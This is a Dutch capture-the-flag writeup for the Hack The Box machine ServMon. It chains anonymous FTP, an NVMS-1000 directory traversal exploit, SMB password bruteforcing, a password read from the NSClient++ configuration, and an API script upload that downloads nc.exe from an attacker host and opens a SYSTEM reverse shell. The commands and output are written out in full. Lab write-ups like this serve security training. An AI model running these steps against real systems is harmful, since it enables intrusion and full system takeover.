Machine Writeups

Hack The Box Writeup: Servmon

ServMon is een Easy Microsoft Windows box goed voor 20 punten. De slogan Monitoring is not protection doet zijn naam dan ook echt eer aan. Let’s do this!

[0x1] Reconnaissance & Enumeration

Stap 1 is het uitvoeren van een poort en service scan voor de machine. Aangezien het een Microsoft Windows machine is zijn er aardig wat RPC-poorten zichtbaar, maar ook enkele bekende poorten.

nmap -sC -sV -p- -T5 -oA servmon-allports 10.10.10.184

# Nmap 7.80 scan initiated Sun Apr 12 19:07:33 2020 as: nmap -sC -sV -p- -T5 -oA servmon-allports 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.024s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

Host script results:
|_clock-skew: 24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-12T18:11:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 19:11:29 2020 -- 1 IP address (1 host up) scanned in 236.52 seconds

Uit de poortscan komt een actieve tcp/21 poort naar voren die volgens de nap scan een FTP-service biedt met anonymous access. Dit is een goed startpunt om op onderzoek uit te gaan.

[0x2] Initial Access

Het aanmelden als anonymous werkt en ik heb toegang door middel van FTP.

ftp open 10.10.10.184

Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

De FTP-service geeft toegang tot een tweetal mappen van twee zogenaamde medewerkers.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan

De map van Nadine bevat een bestand met de naam Confidential.txt wat klinkt als een interessant bestand om te downloaden. Door middel van het get-command download ik het bestand naar mijn lokale machine.

ftp> cd Nadine
250 CWD command successful.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.

get confidential.txt
local: confidential.txt remote: confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.11 secs (1.5681 kB/s)

In de map van Nathan staat een to-do list. Vaak zijn hierin weer nieuwe hints te vinden die kunnen helpen bij de verdere zoektocht naar de root-flag. Ook dit bestand download ik om straks te bekijken.

ftp> cd Nathan
250 CWD command successful.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.

Het bestand confidential.txt geeft aan dat er een password.txt bestand bestaat in de Desktop map van Nathan en wordt er verwezen naar een “Secure folder”.

cat confidential.txt

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Het bestand todo.txt geeft een aantal interessante hints naar het verdere verloop. Kennelijk draait er een applicatie NVMS die nog bereikbaar is voor iedereen en het wachtwoord van aangepast moet worden.

cat Notes\ to\ do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

NVMS gevonden op http://10.10.10.184

HTB_SERVMON_NVMS1000

Het NVMS blijkt een Directory Traversal vulnerabilty te bevatten en via ExploitDB download ik de Python exploit. Hiermee kan ik het bestand Passwords.txt vanaf de Desktop van Nathan downloaden en lokaal opslaan.

python exploit.py http://10.10.10.184/Pages users/Nathan/Desktop/Passwords.txt Passwords.txt

Directory Traversal Succeeded
Saving Output

Niet 1 maar 6 wachtwoorden. Mogelijk werken ze niet allemaal, of hebben ze allemaal een andere functie.

cat Passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me

Ik gebruik de Metasploit scanner smb_login om op basis van het bestand met wachtwoorden te bekijken of ik via SMB kan aanmelden met de gebruikersnaam “nathan“. Uit de nmap scan kwam naar voren dat poort 445 open staat voor SMB.

msf5 > use auxiliary/scanner/smb/smb_login

msf5 auxiliary(scanner/smb/smb_login) > set pass_file Passwords.txt
pass_file => Passwords.txt

msf5 auxiliary(scanner/smb/smb_login) > set smbuser nathan
smbuser => nathan

msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184

msf5 auxiliary(scanner/smb/smb_login) > run

Tijdens het bruteforcen van de SMB login voor Nathan wordt er geen treffer gevonden. De wachtwoorden zijn niet van toepassing op dit account.

[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:B3WithM30r4ga1n5tMe',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:L1k3B1gBut7s@W0rk',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:0nly7h3y0unGWi11F0l10w',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:IfH3s4b0Utg0t0H1sH0me',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:Gr4etN3w5w17hMySk1Pa5$',
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nogmaals een SMB bruteforce maar dan met het account van Nadine. Tijdens deze run komt er wel een treffer naar voren, namelijk: L1k3B1gBut7s@W0rk.

msf5 auxiliary(scanner/smb/smb_login) > set smbuser nadine
smbuser => nadine
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:B3WithM30r4ga1n5tMe',
[+] 10.10.10.184:445 - 10.10.10.184:445 - Success: '.\nadine:L1k3B1gBut7s@W0rk'
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[0x3] User Flag

De gevonden credentials gebruik ik om te proberen aan te melden via SSH. Uit de nmap-scan kwam deze service naar voren. In dit geval is het een succesvolle login en kan ik op zoek naar nieuwe informatie.

ssh nadine@10.10.10.184
nadine@10.10.10.184's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

Eenmaal verbonden met de server kijk ik of er een user-flag te vinden is in het profiel van Nadine. Op haar desktop staat de user.txt.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
18/04/2020 11:57 34 user.txt
        1 File(s) 34 bytes
        2 Dir(s) 27,417,485,312 bytes free

Het account van Nadine heeft leesrechten op de file en hiermee is de user-flag binnen!

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
ec99b381bef3129dfa5824cef82b1c6c

[0x4] Root-flag

Tijdens het rondkijken in C:\Program Files\ kom ik een NSClient++ map tegen. Het eerder gevonden to-do lijstje gaf aan dat hier beveiliging op toegepast was. Tijdens het rondkijken in nsclient.ini vind ik een wachtwoord en na wat zoeken op ExploitDB vind ik een bekende kwetsbaarheid in deze versie van de monitoring Agent NSClient.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
´╗┐# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

[......clip.....]

Vanuit de output van de nmap scan is zichtbaar dat er nog een website op poort 8443 draait.

HTB_SERVMON_NSCLIENT

Ik maak een tijdelijke map aan op de machine die ik later weer kan verwijderen. Hiermee zit ik geen andere personen in de weg. Vanaf mijn eigen machine biedt ik netcat.exe aan, en een script voor het opzetten van de reverse connection.

nadine@SERVMOND C:\ mkdir sys

nadine@SERVMON C:\sys>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\sys>
PS C:\sys> Invoke-WebRequest -Uri "http://10.10.14.40:8080/nc.exe" -OutFile "C:\sys\nc.exe"
PS C:\sys> Invoke-WebRequest -Uri "http://10.10.14.40:8081/nc_script.bat" -OutFile "C:\sys\nc_script.bat"

De eerste stap van de exploit is om mijn custom script met reverse connection te uploaden. Door middel van de API is het mogelijk om een eigen bat-bestand te uploaden naar de centrale scripts map op dezelfde server. Het wachtwoord voor de admin gebruiker heb ik uit de nsclient++ gehaald en komt hierbij van pas.

nadine@SERVMON C:\sys>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/nc_script.bat --data-binary
 @nc_script.bat
Enter host password for user 'admin':
Added nc_script as scripts\nc_script.bat

Voordat ik het script ga uitvoeren start ik een Netcat Listener op mijn eigen machine op poort 1337.

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...

De tweede stap van de exploit is het daadwerkelijk uitvoeren (execute) van het script dat ik eerder geupload heb. Ook hier gebruik ik hetzelfde wachtwoord.

nadine@SERVMON C:\sys>curl -s -k -u admin "https://localhost:8443/api/v1/queries/nc_script/commands/execute"
Enter host password for user 'admin':

Het script wordt via de API aangeroepen en uitgevoerd. Direct hierna zie ik de reverse connection binnenkomen op mijn listener. Omdat de NSclient service als SYSTEM users draait, is de shell onder deze gebruiker gestart.

connect to [10.10.14.40] from (UNKNOWN) [10.10.10.184] 49882
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
nt authority\system

C:\Program Files\NSClient++>hostname
ServMon

In de Desktop-directory van de Administrator staat de root.txt en hiermee lijk ik de machine afgrond te hebben.

C:\Program Files\NSClient++>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C
 Directory of c:\Users\Administrator\Desktop
08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
19/04/2020 07:41 34 root.txt
        1 File(s) 34 bytes
        2 Dir(s) 27,422,359,552 bytes free

Laatste stap, het weergeven van de root-flag en de ServMon op Hack The Box als geroot te bestempelen. Gotcha!

c:\Users\Administrator\Desktop>type root.txt
type root.txt
1fb45c5963b0af52703933b40e68c728

Martijn

Martijn is naast eigenaar van tech365 ook werkzaam als IT Professional. Zijn passies zijn gadgets, fotografie en alles wat met automotive te maken heeft. Je kunt hem ook vinden als blogger op wielerblog www.lifebehindbars.nl

Gerelateerde berichten

Geef een reactie

Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

Back to top button